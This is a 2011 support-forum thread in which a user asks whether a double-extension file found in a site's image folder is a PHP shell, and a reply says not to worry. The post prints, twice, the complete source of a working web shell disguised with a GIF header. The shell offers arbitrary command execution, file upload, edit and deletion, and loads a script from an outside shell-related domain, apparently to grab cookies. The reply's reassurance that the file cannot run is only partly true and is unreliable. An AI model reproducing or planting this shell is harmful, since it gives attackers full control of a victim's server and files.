DaddyScripts.com

Collection of Daddy's scripts!
http://forum.daddyscripts.com/

HACKING ATTEMPTS?

http://forum.daddyscripts.com/viewtopic.php?f=33&t=251

Page 1 of 1

HACKING ATTEMPTS?

PostPosted: Sat Aug 06, 2011 10:49 pm
by serjb
Hi,

I found in folder ./image/ double extention file (261691*.php.gif)

As far as i can judje it's a PHP shell, or not? And what i must do?

Code: Select all
[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

print "</table><br><br>";

if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# Upload di file

#

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# Modifica o cancellazione di file

#

if (isset($_POST['dofile']))  {
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Modifica

   #

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Cancellazione

   #

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Esecuzione di un comando

#

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# Visualizzazione di file

#

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Visualizzazione del contenuto di una directory

#

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Directory superiore

   #

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # File comune

   #

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]

Re: HACKING ATTEMPTS?

PostPosted: Sun Aug 07, 2011 12:45 pm
by SamEA
serjb wrote:Hi,

I found in folder ./image/ double extention file (261691*.php.gif)

As far as i can judje it's a PHP shell, or not? And what i must do?

Code: Select all
[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

print "</table><br><br>";

if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# Upload di file

#

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# Modifica o cancellazione di file

#

if (isset($_POST['dofile']))  {
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Modifica

   #

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Cancellazione

   #

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Esecuzione di un comando

#

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# Visualizzazione di file

#

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Visualizzazione del contenuto di una directory

#

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Directory superiore

   #

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # File comune

   #

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]


I should not be alarmed, because PHP will not run the above file with the extension ".gif", as PHP will only process files on the webserver if, and only if the extension ends with ".php" (unless configured otherwise). This is why it is important to allow only certain image file types, however this does to apply to file uploading.